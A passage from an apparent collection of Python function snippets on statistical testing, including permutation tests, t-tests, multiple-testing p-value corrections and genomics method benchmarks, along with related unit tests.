\"\r\n \"zero and one.\" % confidence_level)\r\n\r\n # Calculate the correlation coefficient.\r\n corr_coeff = corr_fn(x_items, y_items)\r\n\r\n # Perform the parametric test first.\r\n x_items, y_items = array(x_items), array(y_items)\r\n n = len(x_items)\r\n df = n - 2\r\n if n < 3:\r\n parametric_p_val = 1\r\n else:\r\n try:\r\n t = corr_coeff / sqrt((1 - (corr_coeff * corr_coeff)) / df)\r\n parametric_p_val = t_tailed_prob(t, df, tails)\r\n except (ZeroDivisionError, FloatingPointError):\r\n # r/rho was presumably 1.\r\n parametric_p_val = 0\r\n\r\n # Perform the nonparametric test.\r\n permuted_corr_coeffs = []\r\n nonparametric_p_val = None\r\n better = 0\r\n for i in range(permutations):\r\n permuted_y_items = y_items[permutation(n)]\r\n permuted_corr_coeff = corr_fn(x_items, permuted_y_items)\r\n permuted_corr_coeffs.append(permuted_corr_coeff)\r\n\r\n if tails is None:\r\n if abs(permuted_corr_coeff) >= abs(corr_coeff):\r\n better += 1\r\n elif tails == 'high':\r\n if permuted_corr_coeff >= corr_coeff:\r\n better += 1\r\n elif tails == 'low':\r\n if permuted_corr_coeff <= corr_coeff:\r\n better += 1\r\n else:\r\n # Not strictly necessary since this was checked above, but included\r\n # for safety in case the above check gets removed or messed up. We\r\n # don't want to return a p-value of 0 if someone passes in a bogus\r\n # tail type somehow.\r\n raise ValueError(\"Invalid tail type '%s'. Must be either None, \"\r\n \"'high', or 'low'.\" % tails)\r\n if permutations > 0:\r\n nonparametric_p_val = (better + 1) / (permutations + 1)\r\n\r\n # Compute the confidence interval for corr_coeff using Fisher's Z\r\n # transform.\r\n z_crit = abs(ndtri((1 - confidence_level) / 2))\r\n ci_low, ci_high = None, None\r\n\r\n if n > 3:\r\n try:\r\n ci_low = tanh(arctanh(corr_coeff) - (z_crit / sqrt(n - 3)))\r\n ci_high = tanh(arctanh(corr_coeff) + (z_crit / sqrt(n - 3)))\r\n except (ZeroDivisionError, FloatingPointError):\r\n # r/rho was presumably 1 or -1. Match what R does in this case.\r\n ci_low, ci_high = corr_coeff, corr_coeff\r\n\r\n return (corr_coeff, parametric_p_val, permuted_corr_coeffs,\r\n nonparametric_p_val, (ci_low, ci_high))", "def correct_pvalues_for_multiple_testing(pvalues, correction_type=\"Benjamini-Hochberg\"):\r\n from numpy import array, empty\r\n pvalues = array(pvalues)\r\n n = float(pvalues.shape[0])\r\n new_pvalues = empty(n)\r\n if correction_type == \"Bonferroni\":\r\n new_pvalues = n * pvalues\r\n elif correction_type == \"Bonferroni-Holm\":\r\n values = [(pvalue, i) for i, pvalue in enumerate(pvalues)]\r\n values.sort()\r\n for rank, vals in enumerate(values):\r\n pvalue, i = vals\r\n new_pvalues[i] = (n - rank) * pvalue\r\n elif correction_type == \"Benjamini-Hochberg\":\r\n values = [(pvalue, i) for i, pvalue in enumerate(pvalues)]\r\n values.sort()\r\n values.reverse()\r\n new_values = []\r\n for i, vals in enumerate(values):\r\n rank = n - i\r\n pvalue, index = vals\r\n new_values.append((n / rank) * pvalue)\r\n for i in range(0, int(n) - 1):\r\n if new_values[i] < new_values[i + 1]:\r\n new_values[i + 1] = new_values[i]\r\n for i, vals in enumerate(values):\r\n pvalue, index = vals\r\n new_pvalues[index] = new_values[i]\r\n return new_pvalues", "def test_auto_cohorting_randomization(self):\r\n course = modulestore().get_course(self.toy_course_key)\r\n self.assertFalse(course.is_cohorted)\r\n\r\n groups = [\"group_{0}\".format(n) for n in range(5)]\r\n self.config_course_cohorts(course, [], cohorted=True,\r\n auto_cohort=True,\r\n auto_cohort_groups=groups)\r\n\r\n # Assign 100 users to cohorts\r\n for i in range(100):\r\n user = User.objects.create(username=\"test_{0}\".format(i),\r\n email=\"a@b{0}.com\".format(i))\r\n get_cohort(user, course.id)\r\n\r\n # Now make sure that the assignment was at least vaguely random:\r\n # each cohort should have at least 1, and fewer than 50 students.\r\n # (with 5 groups, probability of 0 users in any group is about\r\n # .8**100= 2.0e-10)\r\n for cohort_name in groups:\r\n cohort = get_cohort_by_name(course.id, cohort_name)\r\n num_users = cohort.users.count()\r\n self.assertGreater(num_users, 1)\r\n self.assertLess(num_users, 50)", "def test_tpr_fwer(self, syn_genomic_data, syn_labels, syn_labels_0based, syn_labels_cat, syn_fm, syn_idx, rep, syn_true_pvalues):\n\n window_lengths = [35]\n\n best_params_montaez = {'epochs': 500, 'l1_reg': 0.001, 'l2_reg': 0.0001,'lr' :1e-05, 'dropout_rate':0.3, 'hidden_neurons':64, 'n_snps': n_total_snps}\n\n # n_permutations = 2\n\n def combi_compute_pvalues(d, x, fm, l,filter_window_size,pf,ps,k):\n #clf, syn_genomic_data[str(i)][:], fm_2d[str(i)][:], syn_labels[str(i)], 35, 2, 2, 30\n idx, pvalues, _ = combi_method(d, x,fm, l,filter_window_size,pf,ps,k)\n\t\t\t#combi_method(classifier,data, fm, labels, filter_window_size, pnorm_filter, psvm, top_k)\n pvalues_filled = np.ones(n_total_snps)\n pvalues_filled[idx] = pvalues\n del d, l\n return pvalues_filled\n\n def challenger_compute_pvalues(d, x, l_0b, l, idx):\n is_only_zeros = False\n with tensorflow.Session().as_default():\n\n model = create_montaez_dense_model(best_params_montaez)\n\n model.fit(x=x[idx.train], y=l_0b[idx.train],\n validation_data=(x[idx.test], l_0b[idx.test]),\n epochs=best_params_montaez['epochs'],\n callbacks=[\n ReduceLROnPlateau(monitor='val_loss',\n mode='min'),\n ])\n\n model = iutils.keras.graph.model_wo_softmax(model)\n analyzer = innvestigate.analyzer.LRPAlpha2Beta1(model)\n weights = analyzer.analyze(x).sum(0)\n\n if np.max(abs(weights)) < 0.005:\n fig, axes = plt.subplots(1)\n is_only_zeros = True\n axes.plot(np.absolute(weights).sum(axis=1))\n fig.savefig(os.path.join(IMG_DIR, 'test.png'))\n\n pvalues_list = np.zeros((len(window_lengths), weights.shape[0]))\n for i, filter_size in enumerate(window_lengths):\n top_indices_sorted, _ = postprocess_weights(\n weights, top_k, filter_size, p_svm, p_pnorm_filter)\n pvalues = chi_square(d[:, top_indices_sorted], l)\n pvalues_filled = np.ones(n_total_snps)\n pvalues_filled[top_indices_sorted] = pvalues\n pvalues_list[i] = pvalues_filled\n del d, x, l\n\n return pvalues_list, is_only_zeros\n\n fm_2d = syn_fm(\"2d\")\n fm_3d = syn_fm(\"3d\")\n clf = LinearSVC(penalty='l2', loss='hinge', C=1.0000e-05, dual=True, tol=1e-3, verbose=0)\n\n pvalues_per_run_combi = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(\n combi_compute_pvalues)(clf, syn_genomic_data[str(i)][:], fm_2d[str(i)][:], syn_labels[str(i)], 35, 2, 2, 30) for i in tqdm(range(rep))))\n\n pvalues_per_run_rpvt = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(\n chi_square)(syn_genomic_data[str(i)][:], syn_labels[str(i)]) for i in tqdm(range(rep))))\n\n # len(thresholds) * len(window_sizes) * 10020\n a = Parallel(n_jobs=-1, require='sharedmem')(delayed(\n challenger_compute_pvalues)(syn_genomic_data[str(i)][:], fm_3d[str(i)][:], syn_labels_cat[str(i)], syn_labels[str(i)], syn_idx[str(i)]) for i in tqdm(range(rep)))\n\n # INNvestigate bugfix\n zeros_index = np.array(list(np.array(a)[:, 1]))\n pvalues_per_run_dense = np.array(list(np.array(a)[:, 0]))\n\n pvalues_per_run_combi = pvalues_per_run_combi[np.logical_not(zeros_index)]\n pvalues_per_run_dense = pvalues_per_run_dense[np.logical_not(zeros_index)]\n pvalues_per_run_rpvt = pvalues_per_run_rpvt[np.logical_not(zeros_index)]\n true_pvalues = syn_true_pvalues[np.logical_not(zeros_index)]\n\n # COMBI\n res_combi = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(compute_metrics)(pvalues_per_run_combi, true_pvalues, threshold) for threshold in tqdm(thresholds)))\n tpr_combi, _, fwer_combi, precision_combi = res_combi.T\n\n\n # T_star - WARNING TAKES FOREVER\n tpr_permuted = 0\n fwer_permuted = 0\n precision_permuted = 0\n\n \"\"\"\n for i in range(rep):\n with tensorflow.Session().as_default():\n\n model = create_montaez_dense_model_2(best_params_montaez_2)\n t_star = permuted_deepcombi_method(model, h5py_data[str(i)][:], fm_3d[str(i)][:], labels[str(i)], labels_cat[str(i)], n_permutations, alpha_sig_toy, filter_window_size, top_k, mode='all' )\n ground_truth = np.zeros((1,n_total_snps),dtype=bool)\n ground_truth[:,5000:5020] = True\n tpr, _, fwer, precision = compute_metrics(pvalues_per_run_rpvt[i], ground_truth, t_star) \n tpr_permuted += tpr\n fwer_permuted += fwer\n precision_permuted += precision\n tpr_permuted/=rep\n fwer_permuted/=rep\n precision_permuted/=rep\n \"\"\"\n\n # RPVT\n\n res_rpvt = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(compute_metrics)(\n pvalues_per_run_rpvt, true_pvalues, threshold) for threshold in tqdm(thresholds)))\n\n tpr_rpvt, _, fwer_rpvt, precision_rpvt = res_rpvt.T\n\n # Plot\n fig, axes = plt.subplots(2)\n fig.set_size_inches(18.5, 10.5)\n ax1, ax2 = axes\n\n ax1.set_ylim(0, 0.45)\n ax1.set_xlim(0, 0.1)\n\n ax1.set_ylabel('TPR')\n ax1.set_xlabel('FWER')\n ax1.plot(fwer_combi, tpr_combi, '-o',\n label='Combi')\n ax1.plot(fwer_rpvt, tpr_rpvt, '-o',\n label='RPVT')\n #ax1.plot(fwer_permuted, tpr_permuted, '-x',\n # label='COMBI & permuted threshold - ttbr={}'.format(ttbr))\n\n ax2.set_ylabel('Precision')\n ax2.set_xlabel('TPR')\n ax2.plot(tpr_combi, precision_combi, '-o',\n label='Combi')\n ax2.plot(tpr_rpvt, precision_rpvt, '-o',\n label='RPVT')\n #ax2.plot(tpr_permuted, precision_permuted, '-x',\n # label='COMBI & permuted threshold - ttbr={}'.format(ttbr))\n\n # Save results\n np.save(os.path.join(NUMPY_ARRAYS, 'combi-tpr-{}'.format(ttbr)), tpr_combi)\n np.save(os.path.join(NUMPY_ARRAYS, 'combi-fwer-{}'.format(ttbr)), fwer_combi)\n np.save(os.path.join(NUMPY_ARRAYS, 'combi-precision-{}'.format(ttbr)), precision_combi)\n np.save(os.path.join(NUMPY_ARRAYS, 'permuted-avg-tpr-pt{}'.format(ttbr)), tpr_permuted)\n np.save(os.path.join(NUMPY_ARRAYS, 'permuted-avg-fwer-pt{}'.format(ttbr)), fwer_permuted)\n np.save(os.path.join(NUMPY_ARRAYS, 'permuted-avg-precision-pt{}'.format(ttbr)), precision_permuted)\n\n np.save(os.path.join(NUMPY_ARRAYS, 'rpvt-tpr-{}'.format(ttbr)), tpr_rpvt)\n np.save(os.path.join(NUMPY_ARRAYS, 'rpvt-fwer-{}'.format(ttbr)), fwer_rpvt)\n np.save(os.path.join(NUMPY_ARRAYS, 'rpvt-precision-{}'.format(ttbr)), precision_rpvt)\n\n # CHALLENGER\n for i, window in enumerate(window_lengths):\n pvalues_challenger = pvalues_per_run_dense[:, i]\n\n res_dense = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(compute_metrics)(\n pvalues_challenger, true_pvalues, threshold) for threshold in tqdm(thresholds)))\n\n tpr_dense, _, fwer_dense, precision_dense = res_dense.T\n np.save(os.path.join(NUMPY_ARRAYS, 'tpr-{}-{}'.format(window, ttbr)), tpr_dense)\n np.save(os.path.join(NUMPY_ARRAYS, 'fwer-{}-{}'.format(window, ttbr)), fwer_dense)\n np.save(os.path.join(NUMPY_ARRAYS, 'precision-{}-{}'.format(window, ttbr)), precision_dense)\n assert fwer_combi.max() <= 1 and fwer_combi.min() >= 0\n ax1.plot(fwer_dense, tpr_dense, '-x', label='DeepCOMBI')\n ax2.plot(tpr_dense, precision_dense, '-x', label='DeepCOMBI')\n\n ax1.legend()\n ax2.legend()\n fig.savefig(\n os.path.join(IMG_DIR, 'tpr_fwer_montaez_combi_newsettings.png'.format(zeros_index.sum())),\n dpi=300)", "def make_nonparametric_ab_test(dataframe, iteration_column,\n target_column, not_normal_ids_list):\n rejected_pairs = []\n not_rejected_pairs = []\n category_list = list(itertools.combinations(not_normal_ids_list, 2))\n for i in category_list:\n ttest, p_value = mannwhitneyu(dataframe.\n loc[dataframe[iteration_column] == i[0],\n target_column],\n dataframe.\n loc[dataframe[iteration_column] == i[1],\n target_column])\n if p_value >= 0.05:\n not_rejected_pairs.append(i)\n else:\n rejected_pairs.append(i)\n return rejected_pairs, not_rejected_pairs", "def z_t_test_single_sample(p_sample_mean, p_hypothesized_mean, p_provided_std, p_sample_size):\n\n # -- -------------------------------------------\n sem = p_provided_std / np.sqrt(p_sample_size)\n\n z_t_stat = (p_sample_mean - p_hypothesized_mean) / sem\n # -- -------------------------------------------\n\n # -- -------------------------------------------\n Result = namedtuple('Result', 'z_t_stat sem')\n\n result = Result(\n z_t_stat,\n sem\n )\n\n return result\n # -- -------------------------------------------", "def _infer_pvalues(self, effect, perm, p=.05, mcp='maxstat'):\n assert all([isinstance(k, np.ndarray) for k in (effect, perm)])\n n_perm = perm.shape[0]\n # compute the minimum number of required permutations\n n_perm_req = int(10. / p)\n if n_perm < n_perm_req:\n logger.warning(f\"For inferences at p<{p}, it is recommended to per\"\n f\"form at least n_perm={n_perm_req} permutations\")\n\n # ---------------------------------------------------------------------\n logger.info(f\" infer p-values at (p={p}, mcp={mcp})\")\n # computes the pvalues\n if mcp is 'maxstat':\n max_p = perm.reshape(n_perm, -1).max(1)[np.newaxis, ...]\n nb_over = (effect[..., np.newaxis] <= max_p).sum(-1)\n pvalues = nb_over / n_perm\n # non-signi. p-values are set to 1. and min(pvalues) = 1 / n_perm\n pvalues[pvalues >= p] = 1.\n pvalues = np.maximum(1. / n_perm, pvalues)\n elif mcp in ['fdr', 'bonferroni']:\n from mne.stats import fdr_correction, bonferroni_correction\n fcn = fdr_correction if mcp is 'fdr' else bonferroni_correction\n # compute the p-values\n pvalues = (effect[np.newaxis, ...] <= perm).sum(0) / n_perm\n pvalues = np.maximum(1. / n_perm, pvalues)\n # apply correction\n is_signi, pvalues = fcn(pvalues, alpha=p)\n pvalues[~is_signi] = 1.\n\n return pvalues", "def par_test_14(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.TKW_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.TKW_factor)\n par_res = self.XYZ_par_factor.mult(self.TKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values", "def test_distance_matrix_permutation_test_symmetric(self):\r\n def make_result_list(*args, **kwargs):\r\n return (\r\n [distance_matrix_permutation_test(*args)[2] for i in range(10)]\r\n )\r\n\r\n m = array([[0, 1, 3], [1, 2, 4], [3, 4, 5]])\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n n = 100\r\n\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n)\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n, tails='high')\r\n self.assertSimilarMeans(r, 0.77281447417149496, 0)\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n, tails='low')\r\n self.assertSimilarMeans(r, 4. / 6.)\r\n\r\n # The following lines are not part of the test code, but are useful in\r\n # figuring out what t-scores all of the permutations will yield.\r\n # permutes = [[0, 1, 2], [0, 2, 1], [1, 0, 2],\\\r\n # [1, 2, 0], [2, 0, 1], [2, 1, 0]]\r\n #results = []\r\n # for p in permutes:\r\n # p_m = permute_2d(m,p)\r\n # results.append(t_two_sample(\\\r\n # [p_m[0,1],p_m[0,2]],[p_m[2,1]],tails='high'))\r\n # print results\r", "def test_one_sample_right_tailed(self):\n rng = np.random.default_rng(615419864354)\n\n passed = 0\n n_iter = 500\n for _ in range(n_iter):\n data1 = rng.normal(12.2, 1, 100)\n\n ttest = one_sample_ttest(data1, 12.2, 'right')\n\n if ttest['P_value'] < .05:\n passed +=1\n\n self.assertAlmostEqual(passed / n_iter, .05, delta=.01)", "def create_panel_of_normals_advanced(tsca_id, all_samples, num_normals_per_cohort_involved = 3, batches_to_pick_from = []):\n # Get all samples\n batch_samples = all_samples[all_samples['tsca_id']==tsca_id]\n # Batch normals \n batch_normals = batch_samples[batch_samples['sample_type']==\"Normal\"]\n # Number of normals in batch\n num_normals_from_batch = batch_normals.shape[0]\n # Cohorts of samples in batch\n cohorts_involved = batch_samples['cohort_code'].unique()\n\n # Only select normals from the restricted batches\n restricted_normals = all_samples[(all_samples['tsca_id'].isin(batches_to_pick_from)) & (all_samples['sample_type']==\"Normal\")]\n # Merge all normals from cohorts involved\n cohorts_normals_lst = []\n for cohort_involved in cohorts_involved:\n cohort_normals = restricted_normals[(restricted_normals['cohort_code']==cohort_involved)] \\\n .iloc[:num_normals_per_cohort_involved]\n cohorts_normals_lst.append(cohort_normals)\n\n cohorts_normals = pd.concat(cohorts_normals_lst)\n\n # Final PoN: batch normals + normals cohorts involved\n final_pon = pd.concat([batch_normals, cohorts_normals])\n num_normals = final_pon.shape[0]\n final_pon_name = \"PoN_%s_%s_batch_normals_%s_normals_per_cohort_%s_total\"\\\n %(tsca_id, num_normals_from_batch, num_normals_per_cohort_involved, num_normals)\n\n # Prepare for FC format\n final_pon['membership:sample_set_id'] = final_pon_name\n final_pon['sample_id'] = final_pon['entity:sample_id']\n final_pon = final_pon[['membership:sample_set_id', 'sample_id']]\n return final_pon, final_pon_name", "def attest_ind (a, b, dimension=None, printit=0, name1='Samp1', name2='Samp2',writemode='a'):\r\n if dimension == None:\r\n a = N.ravel(a)\r\n b = N.ravel(b)\r\n dimension = 0\r\n x1 = amean(a,dimension)\r\n x2 = amean(b,dimension)\r\n v1 = avar(a,dimension)\r\n v2 = avar(b,dimension)\r\n n1 = a.shape[dimension]\r\n n2 = b.shape[dimension]\r\n df = n1+n2-2\r\n svar = ((n1-1)*v1+(n2-1)*v2) / float(df)\r\n zerodivproblem = N.equal(svar,0)\r\n svar = N.where(zerodivproblem,1,svar) # avoid zero-division in 1st place\r\n t = (x1-x2)/N.sqrt(svar*(1.0/n1 + 1.0/n2)) # N-D COMPUTATION HERE!!!!!!\r\n t = N.where(zerodivproblem,1.0,t) # replace NaN/wrong t-values with 1.0\r\n probs = abetai(0.5*df,0.5,float(df)/(df+t*t))\r\n\r\n if type(t) == N.ndarray:\r\n probs = N.reshape(probs,t.shape)\r\n if probs.shape == (1,):\r\n probs = probs[0]\r\n \r\n if printit <> 0:\r\n if type(t) == N.ndarray:\r\n t = t[0]\r\n if type(probs) == N.ndarray:\r\n probs = probs[0]\r\n statname = 'Independent samples T-test.'\r\n outputpairedstats(printit,writemode,\r\n name1,n1,x1,v1,N.minimum.reduce(N.ravel(a)),\r\n N.maximum.reduce(N.ravel(a)),\r\n name2,n2,x2,v2,N.minimum.reduce(N.ravel(b)),\r\n N.maximum.reduce(N.ravel(b)),\r\n statname,t,probs)\r\n return\r\n return t, probs", "def test_mc_t_two_sample(self):\r\n # Verified against R's t.test() and Deducer::perm.t.test().\r\n\r\n # With numpy array as input.\r\n exp = (-0.11858541225631833, 0.90756579317867436)\r\n I = array([7.2, 7.1, 9.1, 7.2, 7.3, 7.2, 7.5])\r\n II = array([8.8, 7.5, 7.7, 7.6, 7.4, 6.7, 7.2])\r\n obs = mc_t_two_sample(I, II)\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertEqual(len(obs[2]), 999)\r\n self.assertCorrectPValue(0.8, 0.9, mc_t_two_sample, [I, II],\r\n p_val_idx=3)\r\n\r\n # With python list as input.\r\n exp = (-0.11858541225631833, 0.90756579317867436)\r\n I = [7.2, 7.1, 9.1, 7.2, 7.3, 7.2, 7.5]\r\n II = [8.8, 7.5, 7.7, 7.6, 7.4, 6.7, 7.2]\r\n obs = mc_t_two_sample(I, II)\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertEqual(len(obs[2]), 999)\r\n self.assertCorrectPValue(0.8, 0.9, mc_t_two_sample, [I, II],\r\n p_val_idx=3)\r\n\r\n exp = (-0.11858541225631833, 0.45378289658933718)\r\n obs = mc_t_two_sample(I, II, tails='low')\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertEqual(len(obs[2]), 999)\r\n self.assertCorrectPValue(0.4, 0.47, mc_t_two_sample, [I, II],\r\n {'tails': 'low'}, p_val_idx=3)\r\n\r\n exp = (-0.11858541225631833, 0.54621710341066287)\r\n obs = mc_t_two_sample(I, II, tails='high', permutations=99)\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertEqual(len(obs[2]), 99)\r\n self.assertCorrectPValue(0.4, 0.62, mc_t_two_sample, [I, II],\r\n {'tails': 'high', 'permutations': 99}, p_val_idx=3)\r\n\r\n exp = (-2.8855783649036986, 0.99315596652421401)\r\n obs = mc_t_two_sample(I, II, tails='high', permutations=99, exp_diff=1)\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertEqual(len(obs[2]), 99)\r\n self.assertCorrectPValue(0.55, 0.99, mc_t_two_sample, [I, II],\r\n {'tails': 'high', 'permutations': 99, 'exp_diff': 1}, p_val_idx=3)", "def permutation_test_mat(matrix,\n n_1, n_2, n_permutations,\n a00=1, a11=1, a01=0):\n n = n_1 + n_2\n pi = np.zeros(n, dtype=np.int8)\n pi[n_1:] = 1\n\n larger = 0.\n count = 0\n \n for sample_n in range(1 + n_permutations):\n count = 0.\n for i in range(n):\n for j in range(i, n):\n mij = matrix[i, j] + matrix[j, i]\n if pi[i] == pi[j] == 0:\n count += a00 * mij\n elif pi[i] == pi[j] == 1:\n count += a11 * mij\n else:\n count += a01 * mij\n if sample_n == 0:\n statistic = count\n elif statistic <= count:\n larger += 1\n\n np.random.shuffle(pi)\n\n return larger / n_permutations", "def rtest_power_and_reward_crossover():\n #define pilot cohort size\n npatients = 10\n\n #simulate drugX and drugY policies for long term in short term increments\n nstep = int(long_term/short_term)\n\n #init rewards per patient per time for drugx and drugy policies\n drugx_reward = np.zeros((nstep,npatients))\n drugy_reward = np.zeros((nstep,npatients))\n\n #init drugX simulation\n simulator = AbbcEnvironment(patients=npatients)\n #define action taken\n action = np.repeat(1, npatients)\n #main simulation loop\n for step in range(nstep):\n _, drugx_reward[step,:] = simulator.take_action(action=action, simtime=short_term)\n\n #init drugY simulation\n simulator = AbbcEnvironment(patients=npatients)\n #define action taken\n action = np.repeat(2, npatients)\n #main simulation loop\n for step in range(nstep):\n _, drugy_reward[step,:] = simulator.take_action(action=action, simtime=short_term)\n\n #calculate sample size required to resolve effect size for each simulation step.\n zalpha = 1.96 #critical zvalue for p=1-alpha/2\n zbeta = 0.8416 #critical zvalue for p=1-beta\n zsquared = (zalpha + zbeta)**2\n #calculate the diference in effect size\n delta = (np.mean(drugx_reward, axis=1) - np.mean(drugy_reward, axis=1))\n samplesize = np.divide((np.var(drugx_reward, axis=1) + np.var(drugx_reward, axis=1))*zsquared,delta**2)\n print(samplesize)\n print(delta)\n\n #assert max sample size is greater than 100\n assert np.max(samplesize)>100\n\n #assert max sample size at is at least 50 times the mins at short and long terms\n assert np.max(samplesize)>50*samplesize[0]\n assert np.max(samplesize)>50*samplesize[-1]\n\n #assert DrugX is better short term than DrugY\n assert delta[0]>0\n #assert DrugY is better in long term than DrugX\n assert delta[-1]<0", "def test_stat(df,ivar,tvar,equal_var=True,ddof=0):\n ivar_uniques = df[ivar].unique().shape[0]\n tvar_uniques = df[tvar].unique().shape[0]\n if tvar_uniques < 2:\n print \"Only one sample can be generated\"\n return None\n if ivar_uniques <= 10: #This the case of a categorical independant variable. We use chisquare\n ss = pd.crosstab(df[ivar],df[tvar])\n ss = (ss.T/ss.sum(axis=1)).T\n s0,s1 = ss[0].values,ss[1].values\n\n return chisquare(s1,s0,ddof=ddof)\n\n if ivar_uniques >10: #Consider using ttest\n s0 = df[ivar][df[tvar] == 0]\n s1 = df[ivar][df[tvar] == 1]\n return ttest_ind(s1,s0,equal_var=equal_var)", "def distance_matrix_permutation_test(matrix, cells, cells2=None,\r\n f=t_two_sample, tails=None, n=1000, return_scores=False,\r\n is_symmetric=True):\r\n # if matrix is symmetric convert all indices to lower trangular\r\n if is_symmetric:\r\n cells = get_ltm_cells(cells)\r\n if cells2:\r\n cells2 = get_ltm_cells(cells2)\r\n # pull out the special values\r\n special_values, other_values = \\\r\n get_values_from_matrix(matrix, cells, cells2, is_symmetric)\r\n # calc the stat and parameteric p-value for real data\r\n stat, p = f(special_values, other_values, tails)\r\n # calc for randomized matrices\r\n count_more_extreme = 0\r\n stats = []\r\n indices = range(len(matrix))\r\n for k in range(n):\r\n # shuffle the order of indices, and use those to permute the matrix\r\n permuted_matrix = permute_2d(matrix, permutation(indices))\r\n special_values, other_values = \\\r\n get_values_from_matrix(permuted_matrix, cells,\r\n cells2, is_symmetric)\r\n # calc the stat and p for a random subset (we don't do anything\r\n # with these p-values, we only use the current_stat value)\r\n current_stat, current_p = f(special_values, other_values, tails)\r\n stats.append(current_stat)\r\n if tails is None:\r\n if abs(current_stat) > abs(stat):\r\n count_more_extreme += 1\r\n elif tails == 'low':\r\n if current_stat < stat:\r\n count_more_extreme += 1\r\n elif tails == 'high':\r\n if current_stat > stat:\r\n count_more_extreme += 1\r\n\r\n # pack up the parametric stat, parametric p, and empirical p; calc the\r\n # the latter in the process\r\n result = [stat, p, count_more_extreme / n]\r\n # append the scores of the n tests if requested\r\n if return_scores:\r\n result.append(stats)\r\n return tuple(result)", "def test2Samp():\n\n sigmax = 1.0\n sigmay = 3.0\n mux = 0.0\n muy = 3.0\n nx = 10\n ny = 10\n # Update\n np.random.RandomState(0) # set seed to 0\n datax = sigmax * np.random.randn(nx) + mux\n datay = sigmay * np.random.randn(ny) + muy\n datadict = {'x': datax, 'y': datay}\n ranksums(datadict, dataLabel='Test Rank Sums (scipy)')\n ranksums(datadict, dataLabel='Test Rank Sums, Paired (scipy)', paired=True)\n ttest(datadict, dataLabel='Standard t-test (scipy)', \n textline=True, decimals=3, units='mV')\n ttest(datadict, dataLabel='Standard t-test (scipy), paired', paired=True,\n textline=True, decimals=3)\n (p, n) = permTS(datadict, dataLabel='R permTS')\n permutation(datadict, dataLabel='Test simple permute')\n KS(datadict, dataLabel='Test with KS')", "def test_tpms_collated_tsv(configuration_module, sample_id):\n config, _ = configuration_module\n output_dir = config[params.OUTPUT_DIR]\n check_tpms_collated_tsv(output_dir, sample_id, 2)", "def two_tailed_t_test(samples: np.ndarray, H0: float):\n empirical_mean = np.mean(samples, axis=0)\n number_samples = samples.shape[0]\n standard_error = np.std(samples, ddof=1, axis=0) / np.sqrt(number_samples)\n t_value = (empirical_mean - H0) / standard_error\n p_value = 2.0 * (1.0 - t(df=number_samples - 1).cdf(np.abs(t_value)))\n return t_value, p_value", "def run_welchs_ttest(stat1, stat2, alpha, faster):\n m1 = stat1[MEAN]\n m2 = stat2[MEAN]\n\n s1 = stat1[STDDEV]\n s2 = stat2[STDDEV]\n\n n1 = stat1[ROUNDS]\n n2 = stat2[ROUNDS]\n\n df1 = n1 - 1 # degree of freedom of stat1\n df2 = n2 - 1 # degree of freedom of stat2\n\n sample_v1 = s1**2 / n1 # biased estimated sample variance of stat1\n sample_v2 = s2**2 / n2 # biased estimated sample variance of stat2\n\n biased_variance = np.sqrt(sample_v1 + sample_v2)\n # degree of freedom\n df = (sample_v1 + sample_v2) ** 2 / (\n sample_v1**2 / (df1) + sample_v2**2 / (df2)\n )\n\n mean_delta = m1 - m2\n t_stat = mean_delta / biased_variance\n\n if faster:\n # Null hypothesis is stat1 >= stat2.\n # Alternative hypothesis is stat1 < stat2.\n p_value = t.cdf(t_stat, df)\n\n # Compute one sided confidence interval (-inf, x)\n upper_bound = mean_delta + t.ppf(1.0 - alpha, df) * biased_variance\n upper_bound = format(upper_bound, \".5f\")\n lower_bound = \"-inf\"\n else:\n # Null hypothesis is stat1 <= stat2.\n # Alternative hypothesis is stat1 > stat2.\n p_value = 1.0 - t.cdf(t_stat, df)\n\n # Compute one sided confidence interval (x, inf)\n upper_bound = \"inf\"\n lower_bound = mean_delta + t.ppf(alpha, df) * biased_variance\n lower_bound = format(lower_bound, \".5f\")\n\n return TTestResult(\n p_value=p_value,\n t_stat=t_stat,\n lower_bound=lower_bound,\n upper_bound=upper_bound,\n mean_delta=format(mean_delta, \".5f\"),\n )", "def cell_permutation(self):\n\n self.log.info(\"Begin Sample Permutation Analysis.\")\n\n # Initialize some variables.\n self.seg_analyzer.break_points(permutation=True)\n permutation_list = self.seg_analyzer.sample_names\n # cell_permutation_data_dict = defaultdict(lambda: defaultdict(list))\n odds_string = \"\"\n unique_targeted_odds_ratio_list = []\n total_targeted_odds_ratio_list = []\n total_targeted_del_odds_ratio_list = []\n total_targeted_ins_odds_ratio_list = []\n unique_targeted_ins_odds_ratio_list = []\n unique_targeted_del_odds_ratio_list = []\n\n # Run a loop for the iterations. Shuffle the list and make a copy for each loop.\n\n for i in range(int(self.args.Iteration_Count)):\n numpy.random.shuffle(permutation_list)\n shuffled_permutation_list = permutation_list\n sub_list = []\n count = 0\n\n if i % int(self.args.Prog_Check) == 0:\n self.log.info(\"Iteration {0} of {1} for Sample Permutation Analysis.\"\n .format(i, self.args.Iteration_Count))\n\n # Pybedtools keeps all temporary files until Python exits. This helps keep the disk clean.\n pybedtools.cleanup()\n\n # Create a list with two unique, random lists of indices.\n while count < 2:\n n = (numpy.random.choice(shuffled_permutation_list, int(self.args.Sample_Group_Size), replace=False))\n\n # Remove the first set from the list\n shuffled_permutation_list = list(set(shuffled_permutation_list).difference(n))\n sub_list.append(n)\n count += 1\n\n # Retrieve a namedtuple of the permuted samples\n d0 = self.seg_analyzer.target_intersection(sub_list[0])\n d1 = 